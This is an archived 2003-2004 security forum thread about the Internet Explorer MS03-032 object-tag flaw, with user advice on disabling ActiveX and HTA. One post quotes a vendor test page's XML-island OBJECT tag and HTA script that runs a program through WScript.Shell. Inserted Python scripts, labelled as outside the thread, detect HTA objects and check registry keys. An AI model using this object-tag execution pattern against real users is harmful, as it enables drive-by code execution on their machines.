ALERT: Internet Explorer Vulnerability
Paul Wilders
September 8th, 2003, 09:38 PM
A severe vulnerability has been discovered. All IE users are recommended to read this article and can perform a vulnerability test over here:
http://www.secunia.com/MS03-032/
regards.
paul
Primrose
September 8th, 2003, 09:50 PM
And because of that I understand this one is still getting through
VSantivirus No. 1158, Year 7, Monday, September 8, 2003
Troj/JunkSurf.A. It infects just by viewing an HTML page
http://www.vsantivirus.com/junksurf-a.htm
Name: Troj/JunkSurf.A
Type: Trojan horse
Alias: Win32.JunkSurf, Download.Aduent.Trojan, Downloader-ED, TROJ_JUNKSURF.A, VBS_JUNKSURF.A, TrojanDownloader.Win32.Small.aq, Win32/JunkSurf.A.Trojan, Win32/JunkSurf.A, Trojan.Aduent, Troj/JSurf-A, Adware-Surfbar
Date: 5/Sep/03
Platform: Windows 32-bit
Sizes: 6,657 bytes (exe), 508,000 bytes (dll), 1,536 bytes, 932 bytes
This Trojan horse makes use of the vulnerability described in Microsoft security bulletin MS03-032:
Object tag vulnerability
Internet Explorer cannot correctly determine the type of an object returned by a Web server. An attacker could use this weakness to execute arbitrary code on a user's system.
If a user visits the attacker's Web site, the attacker could take advantage of this vulnerability with no other intervention from the user. An attacker could also craft an HTML-format e-mail message to take advantage of this vulnerability.
More information:
MS03-032 Cumulative Update for IE (822925)
http://www.vsantivirus.com/vulms03-032.htm
Peaches4U
September 8th, 2003, 10:02 PM
Paul - can you please explain the following para. on the Secunia website .... What kind of web page? ??? Am not too bright today. :(
WARNING:
If you are vulnerable, the Secunia website will execute Internet Explorer on your system and load a new web page.
Primrose
September 8th, 2003, 10:07 PM
-{ Quote: "
Paul - can you please explain the following para. on the Secunia website .... What kind of web page? ??? Am not too bright today. :(
WARNING:
If you are vulnerable, the Secunia website will execute Internet Explorer on your system and load a new web page.
" }-
It will then load this page...
http://www.secunia.com/MS03-032/TEST_OBJECT/test.html
LowWaterMark
September 8th, 2003, 10:24 PM
Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications.
Paul Wilders
September 8th, 2003, 11:19 PM
Correct, John ;)
Just another reason to be very careful using ActiveX, consider an IE replacement and a safe email client ;)
regards.
paul
BlitzenZeus
September 9th, 2003, 01:22 AM
Thanks for the update, will these HACKtiveX exploits never end?
Paul Wilders
September 9th, 2003, 01:30 AM
-{ Quote: "
...will these HACKtiveX exploits never end?
" }-
That's funny! ;D
regards.
paul
BlitzenZeus
September 9th, 2003, 01:41 AM
-{ Quote: " quoting: Paul Wilders
-{ Quote: " quoting: BlitzenZeus
...will these HACKtiveX exploits never end?
" }-
That's funny! ;D
" }-
I've been calling it that since the early days of IE with Win95 since their proprietary applets have been the source of many security exploits ;)
If they didn't use HacktiveX, vbscripting, and even making new kinds of executables like .hta based on IE there wouldn't be as many exploits as there are today.
Paul Wilders
September 9th, 2003, 02:42 AM
-{ Quote: " quoting: BlitzenZeus
-{ Quote: " quoting: Paul Wilders
-{ Quote: " quoting: BlitzenZeus
...will these HACKtiveX exploits never end?
" }-
That's funny! ;D
" }-
I've been calling it that since the early days of IE with Win95 since their proprietary applets have been the source of many security exploits ;)
" }-
That's a comparatively long time!
-{ Quote: "If they didn't use HacktiveX, vbscripting, and even making new kinds of executables like .hta based on IE there wouldn't be as many exploits as there are today.
" }-
...and the list goes on ;)
regards.
paul
meneer
September 9th, 2003, 02:57 AM
In our company (2500 clients) we disabled ActiveX for the internet sites zone in IE. You don't want to know how many professionally used sites use ActiveX. We've got to move those addresses to the trusted sites zone in IE. That's a lot of work...
I plan to make a black list >:( >:( >:(
Paul Wilders
September 9th, 2003, 03:09 AM
Andre,
-{ Quote: "I plan to make a black list" }-
Nice - post them in a new thread, and keep it up to date! ;D
regards.
paul
JacK
September 9th, 2003, 08:54 AM
-{ Quote: "
Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications.
" }-
Hi John,
Nope, nothing to do: it does not use a *.hta but a *.exe ;)
Maybe the test server was down or overcrowded when you performed the test: the first time I ran it, it also failed.
The only way to prevent it is by deactivating ActiveX in the Internet zone (or at least asking before execution, to get a warning).
Nevertheless, it's a good thing to use htastop ;)
Rgds
LowWaterMark
September 9th, 2003, 01:43 PM
Hey Jack,
Actually, I posted that, not John. ;) It does appear that HTA is used within the test itself... But, I never said the exploit was HTA related. All I said was:
-{ Quote: "Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications." }-
You see, the test didn't work for me even though I knew my system should be vulnerable to it once I had allowed all the IE functions. It wasn't until I checked John's link and realized that it used HTA that I understood. I used HTAstop to re-enable HTA on my system, and then I was able to get the exploit window to come up. (Well, I also had to disable TTT, of course.)
The test uses this link to demonstrate if your system is vulnerable to the exploit:
http://www.secunia.com/MS03-032/TEST_OBJECT/test.html
It comes from the exploit portion of the test page:
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=http://www.secunia.com/MS03-032/TEST_OBJECT/test.html width=0 height=0>
]]>
</exploit>
</security>
</xml>
When I click on the link, it tries to execute "test.hta". If I right-click on the link and do a Save As... it calls up a download dialog box to save test.hta on my system. That's what I was talking about.
Now as far as the exploit itself goes, yes, I noticed the ActiveX use. In fact, I had to set ActiveX to prompt in the first place to even have the test happen. ;)
This is the code in the HTA file which is actually responsible for the newly created IE window that the test shows because a person's system was vulnerable to the original exploit...
<html><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("iexplore.exe \"http://www.secunia.com/MS03-032/VULNERABLE/?ID=0JN5lpFVhCJQHgtYKxldoOMto2tsInTW9ut\"");
</script></html>
I imagine they are using HTA because it's an easy way to run a script locally on a person's PC. Such a script can call up the new IE window to display the test results. Oh, interestingly enough, the "ID" field is unique for every test run. Perhaps they are using that to log the number of unique systems that come through to their webserver. :-\
JacK
September 9th, 2003, 02:55 PM
-{ Quote: " quoting: LowWaterMark
Hey Jack,
Actually, I posted that, not John. ;) It does appear that HTA is used within the test itself... But, I never said the exploit was HTA related. All I said was:
-{ Quote: "Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications." }-
" }-
Hi LowWaterMark,
So sorry for the misunderstanding ;)
I came to the same conclusions as you did, I have ActiveX on prompt and use htastop too :-D
But my so-and-so English let me understand that your post said that preventing hta execution prevented the failure in IE.
So sorry, I am trying hard to improve my English: some more years needed :-D
Best regards,
LowWaterMark
September 9th, 2003, 03:18 PM
No problem at all, Jack. ;)
Actually, I love digging into these kinds of things. Up until now I hadn't seen a real world case where HTA was run locally, without warning, based upon a web based link. (Of course, it needed ActiveX to fire it up, but still, it is interesting.)
Joe Wood
September 27th, 2003, 10:02 PM
I don't know that much about computing yet. What is Active X ?? I'm on Win XP Home. How do I disable it ?
Rickster
September 28th, 2003, 04:05 AM
Hi Joe:
Start Menu > Control Panel > Internet Options > Click Security Tab > Select Custom Level. The first seven options pertain to Active X > Disable those you wish. (I disable all of them in the Internet Zone, but enable all in the trusted zone). When finished click OK and you'll be prompted if you really want to change the settings - click yes or OK. If you're already on-line in IE you can simply click Tools > Internet Options and you'll get to the same place to change your options.
Regards, Rick
Joe Wood
September 28th, 2003, 09:13 AM
Rick, before I disable these ... what is Active X used for ?
JayK
September 28th, 2003, 09:29 AM
-{ Quote: "
Rick, before I disable these ... what is Active X used for ?
" }-
Bad things in general :)
Joe Wood
September 28th, 2003, 09:39 AM
Done. I feel better already !
Thanks for the info Rick.
Pieter_Arntz
September 28th, 2003, 09:55 AM
ActiveX: for how much longer? (http://www.internetnews.com/dev-news/article.php/3070591)
Joe,
ActiveX is used to run programs inside the IE browser.
ActiveX controls being executed on the users computer means that these programs can be exploited (abusing the ActiveX technology) by other malicious programs with a potentially destructive role.
For some websites to work properly you have to enable ActiveX. To do so you could add the sites where you want them to run to your trusted Sites, after disabling ActiveX for the Internet Zone.
Here are a few means to protect yourself from known abuse of ActiveX:
IE-Spyad (http://www.staff.uiuc.edu/~ehowes/resource.htm)
SpywareBlaster (http://www.javacoolsoftware.com/spywareblaster.html)
HTH,
Pieter
Joe Wood
September 28th, 2003, 10:18 AM
Man! am I glad I found this site ! I'm a fairly new computerer, and I've been getting a little paranoid in the last few months ! I've already installed the Spyware Blaster.
Say, how will I know if a website needs the ActiveX enabled ??
I'm on Win XP Home. I have Norton Internet Sec., and I'm behind a Router/Firewall. I also have the Spybot Search and Destroy.
What else should I do, or have, to be a little safer ??
~ Joe www.woodsshop.com/
Pieter_Arntz
September 28th, 2003, 10:33 AM
Hi Joe,
If a website needs ActiveX to work you will get a warning that the page can not be displayed properly.
If you really need it to work and you trust the site, then you can add it to your trusted sites.
A good place to start reading is here: http://www.wilders.org/
Just follow the lead from there.
If you have any questions, you know where to find us. ;)
Regards,
Pieter
Rickster
September 28th, 2003, 05:51 PM
Hi Joe: There was a day when all you could do was just view a page on the web; now scripting and Active X make these pages interactive, like dancing balloons, nifty sparklers with ads and all that good (but exploitable) stuff. It’s typically necessary for playing games on the web, so you can interact with them. I often get the prompt Pieter mentioned and just click OK. Never had trouble viewing the page anyway to view the info I want, so if I miss a dancing balloon, in light of these risks it’s fine by me. I also disable File Downloads; that way, if I hit a tricked link, it won’t be able to download in the first place. If I expect to download something I’m only a couple of clicks away from enabling it.
Over time you get a feel for what sites to put in your trusted zone. Since my regular zone is so restricted when I search around, if a site can’t give me what I want unless I expose these vulnerabilities, I just move to another source that can. Follow the links and other good advice these guys offer. I’ve never had a single exploit/virus/trojan as a result. Among other things, don’t forget to follow good e-mail protocol, since e-mail represents the most prolific threat of all today (just be sure to view mail in plain text and be ultra leery of attachments). Anyway, gaining control of these security settings puts you far ahead of the game and most added security programs too. Later, Rick.
JayK
September 29th, 2003, 05:39 AM
Oh well, Java is almost as dangerous as ActiveX. Well, less so IMHO, obviously because of the way it works, but still quite dangerous.
Joe Wood
September 29th, 2003, 08:55 AM
OK! I've disabled ActiveX. I visit three sites regularly, and have put all three in the Trusted zone. On one of them, jlconline.com, a forum site, I keep getting that warning when I switch between forums, and sometimes between posts. Do I have to live with this, or is there something else I can do??
Rickster
September 29th, 2003, 01:07 PM
Hi. You shouldn't. When you go to your security settings again you'll see four zones > Internet, Local Internet, Trusted sites and Restricted sites, click on Trusted sites, then Advanced and set those to enable active x, etc. then click OK. If the web address is properly entered into the trusted zone, those specific settings will apply when you visit that site - hence, no prompts. For instance, I don't want to hassle with changing my internet settings to get MS updates, so the update site is in my trusted zone where everything is enabled. Later, Rick
Rickster
September 29th, 2003, 01:41 PM
Sorry Joe, I meant click "Custom Level" not Advanced. To the right of the Trusted Sites logo, you'll see a button that says, "Sites" click that to add the web address.
If you have difficulty finding the site's specific address, go to the page or site you desire, right click your mouse, select "Properties" and the site's address will appear in the information. Simply highlight the address, copy and then paste it into that zone. Hope this helps. Rick
AplusWebMaster
September 29th, 2003, 09:38 PM
??? Unpatchable IE vulnerability 'in the wild'
http://www.silicon.com/news/500013/14/6192.html
29 September 2003
"...Security experts have warned that a vulnerability that has apparently been left un-patched by Microsoft is being exploited by attackers "in the wild".
- The 'object type' vulnerability, which was first acknowledged publicly by Microsoft on 20 August this year, allows an attacker to take control of a system by embedding malicious code in a web page. If the web page is viewed by an Internet Explorer browser - even a fully patched browser - the malicious code embedded in the web page will execute, experts say. Despite Microsoft acknowledging the patch doesn't work, it evidently has not yet issued a working fix for the vulnerability...
- Managing director of mail filtering software company Clearswift, Chy Chuawiwat, told ZDNet Australia the vulnerability is serious. "It's definitely there and it continues to be easy to exploit," he said. "It could run anything and the users wouldn't know." Chuawiwat suggests users disable ActiveX controls and plug-ins until Microsoft issues a patch that fixes the vulnerability. "For most enterprises there's no need for ActiveX so it should be disabled," he said. "Our standard policy would remove executables including ActiveX."
- Users can disable ActiveX controls in their Internet Explorer settings by clicking Tools, Internet Options, Security, and then modifying the settings for the 'Internet Zone'. Ironically, in order to patch the system through Microsoft's WindowsUpdate website when a fix becomes available, users must allow ActiveX controls and plug-ins to run in the Internet Zone."
AplusWebMaster
October 2nd, 2003, 06:57 PM
:o
CERT® Incident Note IN-2003-04
- Exploitation of Internet Explorer Vulnerability
October 1, 2003
http://www.cert.org/incident_notes/IN-2003-04.html
"...Attacks include the installation of tools for launching distributed denial-of-service (DDoS) attacks and the use of the victim system's modem to dial pay-per-minute services thereby incurring significant expense to users. By convincing a user running a vulnerable version of Microsoft Internet Explorer (IE) to view an HTML document (e.g., a web page or HTML email), a remote attacker could execute arbitrary code with the privileges of the user...
- The vulnerability...exists due to an interaction between IE's MIME type processing and the way it handles HTML application (HTA) files embedded in OBJECT tags. When an HTA file is referenced by the DATA attribute of an OBJECT element, and the web server returns the Content-Type header set to application/hta, IE may execute the HTA file directly, without user intervention..."
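A content-filter check for the condition the CERT note describes, as an added example that is not part of the original thread: it finds OBJECT DATA targets in a page body (including ones inside an XML data island, as on the test page quoted earlier) and flags those the server labelled application/hta, noting when the URL extension hides that. The hosts, the sample page and the URL-to-header map are constructed, and the function names are hypothetical.

```python
import posixpath
import re
from urllib.parse import urljoin, urlsplit

# Raw-text scan: OBJECT tags are matched anywhere in the body, including
# inside an XML data island / CDATA section, where a DOM parser may not look.
OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
DATA_ATTR = re.compile(
    r"""(?<![\w-])data\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE,
)
HTA_TYPE = "application/hta"

# Constructed sample page (hypothetical hosts under the reserved .example TLD).
SAMPLE_BASE = "http://portal.example/news/index.html"
SAMPLE_HTML = """
<html><body>
<object data="/media/intro.swf" type="application/x-shockwave-flash"></object>
<xml id="island"><security><exploit><![CDATA[
<object data=http://filter-test.example/obj/test.html width=0 height=0>
]]></exploit></security></xml>
</body></html>
"""
# Constructed proxy-log view: URL -> Content-Type header the server returned.
SAMPLE_CONTENT_TYPES = {
    "http://portal.example/media/intro.swf": "application/x-shockwave-flash",
    "http://filter-test.example/obj/test.html": "Application/HTA; charset=utf-8",
}


def object_data_urls(html, base_url):
    """Absolute URLs of every OBJECT DATA attribute found in the raw body."""
    urls = []
    for tag in OBJECT_TAG.findall(html):
        match = DATA_ATTR.search(tag)
        if match:
            value = next(g for g in match.groups() if g is not None)
            urls.append(urljoin(base_url, value.strip()))
    return urls


def media_type(content_type_header):
    """Lower-cased type/subtype with parameters such as charset removed."""
    return content_type_header.split(";", 1)[0].strip().lower()


def find_hta_objects(html, base_url, content_type_for):
    """Flag OBJECT DATA targets that the server labelled application/hta.

    content_type_for(url) returns the observed Content-Type header or None.
    'disguised' is True when the URL extension is not .hta, i.e. the URL
    alone gives a filter no hint that an HTA is being delivered.
    """
    findings = []
    for url in object_data_urls(html, base_url):
        header = content_type_for(url)
        if header is None or media_type(header) != HTA_TYPE:
            continue
        extension = posixpath.splitext(urlsplit(url).path)[1].lower()
        findings.append(
            {"url": url, "url_extension": extension, "disguised": extension != ".hta"}
        )
    return findings


if __name__ == "__main__":
    for hit in find_hta_objects(SAMPLE_HTML, SAMPLE_BASE, SAMPLE_CONTENT_TYPES.get):
        print(hit)
```

The check keys on the response header rather than the file name, which is why a link ending in .html can still be reported.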
Joe Wood
October 2nd, 2003, 07:49 PM
Are you all trying to scare me about ActiveX? I'm paranoid enough, being a fairly new computerer! Everyone I ask doesn't know much about this, as if it's not a big deal.
How many people are being attacked right now?
I disabled it for the last few days, but decided to enable it again because of warnings I was getting at www.jlconline.com/ .
Say, can we meet at the middle, and only disable a few of those ActX settings??
Isn't my Norton Internet, and router/firewall, blocking whatever might come thru?
AplusWebMaster
October 2nd, 2003, 08:12 PM
-{ Quote: "Are you all trying to scare me about ActiveX ?" }-
;) - I don't believe -anyone- here is trying to "scare" anybody. The purpose is only to advise of a potential for catastrophic failure either on the user's PC or network since they may be exposed to the vulnerability.
-{ Quote: "How many people are being attacked right now ?
" }-
??? That is an "unknown" difficult for anyone to quantify - any suggestions?
-{ Quote: "Say, can we meet at the middle, and only disable a few of those ActX settings ??" }-
- You'll have to ask those who are exploiting others - but until MS comes up with a fix/patch, the good advice is to -disable ActiveX in IE, -or- obtain/use another browser that is not affected by this vuln.
-{ Quote: "Isn't my Norton Internet , and router/firewall blocking whatever might come thru ?
" }-
:o - No, because you've already granted "defacto" access to your PC through the firewall by the browser...
AplusWebMaster
October 4th, 2003, 12:47 AM
;) See this thread (http://www.wilderssecurity.com/showthread.php?t=14547)...!!!
Cumulative Patch for Internet Explorer (828750)
Originally posted: October 3, 2003
(You can bet many tests will take place today - overtime, folks!)
Joe Wood
October 4th, 2003, 08:27 AM
OK, I went and installed those two new updates, and, I went and read that thread (which I really didn't understand). Now, what is this about a Test ??
Are these updates addressing the ActiveX issue ?
VikingStorm
October 4th, 2003, 09:58 PM
The update seems to have problems installing for some reason. When I update through windowsupdate, it lists it as IE6 SP1, installs it, and says it was successful. However, when I return, it says it's not updated! If I download the patch for SP1 manually, it says I don't have SP1. If I try to reinstall IE6 SP1, it says I have a newer version than the installer has available. Is this purely screwed up? (I used HTAStop since the last time, does it mean I'm safe?)
Don't I have SP1 installed? (last time I had to use the manual 6.0 patch which was the botched patch anyways, but introduced the random broken images problem again, ironically, the non-working SP1 Oct. Patch that doesn't install all the way actually fixed the broken image problem)
AplusWebMaster
October 6th, 2003, 03:14 PM
??? Uncertain as to "why" the patch install failed...
But the WindowsUpdate site -requires- "Active X" be -enabled-...so if HTAStop was used, that very effectively -disables- "Active X"...hmmm...
JacK
October 6th, 2003, 04:25 PM
-{ Quote: "
??? Uncertain as to "why" the patch install failed...
But the WindowsUpdate site -requires- "Active X" be -enabled-...so if HTAStop was used, that very effectively -disables- "Active X"...hmmm...
" }-
Hello,
HTAStop doesn't disable ActiveX ;) It just disables mshta.exe
First, open regedit and see whether you have this key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{96543d59-497a-4801-a1f3-5936aacaf7b1}]
@="Q828750"
"IsInstalled"=dword:00000001
"Version"="6,0,2800,1264"
"ComponentID"="Q828750"
If yes, it's an error in WU and you should add this Entry in your Registry :
Name KB828750
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB828750]
@="Preventing reinstall KB828750"
CAUTION ! : don't add this key if you don't have the entry above.
Rgds,
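JacK's check-then-add procedure as a script, in an added example that is not from the thread or from Microsoft: it parses a regedit export (the sample is constructed from the values in the post) and only proposes the Uninstall entry when the Active Setup entry is present and marked installed. The function names and result strings are hypothetical, and the export is assumed to cover both registry branches.

```python
import re

ACTIVE_SETUP = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup"
                r"\Installed Components\{96543d59-497a-4801-a1f3-5936aacaf7b1}")
UNINSTALL = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
             r"\CurrentVersion\Uninstall\KB828750")

# Constructed sample export, built from the values quoted in the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{96543d59-497a-4801-a1f3-5936aacaf7b1}]
@="Q828750"
"IsInstalled"=dword:00000001
"Version"="6,0,2800,1264"
"ComponentID"="Q828750"
'''

VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg(text):
    """Parse regedit export text into {key_path: {value_name: value}}.

    Key paths and value names are lower-cased because the registry treats
    them case-insensitively. Only string and dword values are decoded.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        match = VALUE_LINE.match(line)
        if current is None or not match:
            continue  # header line, hex continuation, or unsupported type
        name = "@" if match.group(1) == "@" else match.group(1)[1:-1].lower()
        value = match.group(2)
        if value.lower().startswith("dword:"):
            current[name] = int(value[6:], 16)
        elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            current[name] = value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    return keys


def wu_workaround(text):
    """Decide whether the Uninstall entry from the post should be added."""
    keys = parse_reg(text)
    component = keys.get(ACTIVE_SETUP.lower())
    if (component is None or component.get("componentid") != "Q828750"
            or component.get("isinstalled") != 1):
        return "do-not-add"        # the CAUTION in the post: no entry, no fix
    if UNINSTALL.lower() in keys:
        return "already-present"
    return "add-uninstall-key"


def uninstall_fragment():
    """The .reg text for the entry the post describes, for review before import."""
    return '[%s]\n@="Preventing reinstall KB828750"\n' % UNINSTALL


if __name__ == "__main__":
    print(wu_workaround(SAMPLE_REG))
```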
bigc73542
October 18th, 2003, 11:28 PM
I tried to take the test but my McAfee virus scan kept stopping the script from loading. I don't know if I passed or not ??? No other page ever loaded
FukenFooser 007.5
October 20th, 2003, 01:57 AM
???
"Just another reason to be very careful using ActiveX, consider an IE replacement and a safe email "
Quote from paul (no, I don't know how you techs do the quotes).
Just wondering what you would recommend as a sub for it??
Thanks for all the advice and help "Wilders" is giving the world!!
8)
Whynot
February 11th, 2004, 05:26 AM
HI,
I hope this is in the correct forum. I've just received notification of the latest vulnerabilities (http://www.channelweb.com/sections/Newscenters/Article.asp?newscenterID=55&ArticleID=47861) in Windows and IE. Now, from past experience, some of these patches can cause other (un)related problems. My question is - if users are using properly(?) configured firewalls, AV software, Trojan Scanners and possibly PG, does that obviate the need to patch immediately?
ShotgunGirl
March 3rd, 2004, 09:51 PM
Just a comment from a newbie. Just took the little test. Hee hee, the firewall stopped it cold. Yes sir, the firewall. After peeking at the test it's certain that my "other" security would have prevented it executing.
Didn't read the entire thread here but what was read never mentioned a firewall. Oh, actX is wide open on this OS. Using IE
ShotgunGirl
March 3rd, 2004, 10:25 PM
TCP Connection to {websrv.secunia.com} [213.1:80] was blocked {ip address clipped out}
"internet explorer cannot open the internet site {http://secunia.com/ms03-032/test_object/test.html}"
Rita
July 8th, 2004, 02:47 PM
Hi Paul
I did the test and sure enough Secunia was loaded on to the other page. What does this mean and do I need to do something to fix it? I am only learning about computers and all the security stuff, therefore I only understand half of what I read, but guess I will learn sometime. Hope this is not too dumb a question but I can only learn thru asking questions
thank you
Rita :-[
iceni60
July 15th, 2004, 09:20 AM
Hello, Rita, I am learning too. I think this will stop it. Go to post no. 8 in this thread, and copy bigc's advice. I think there are also two more ActiveX settings below bigc's settings. I'll try and take a screenshot to show how I've been told to have it set. Here's the link.
http://www.wilderssecurity.com/showthread.php?t=41342
there is also htastop just download and then block
http://www.nsclean.com/htastop.html
iceni60
July 15th, 2004, 09:26 AM
here's the screenshot...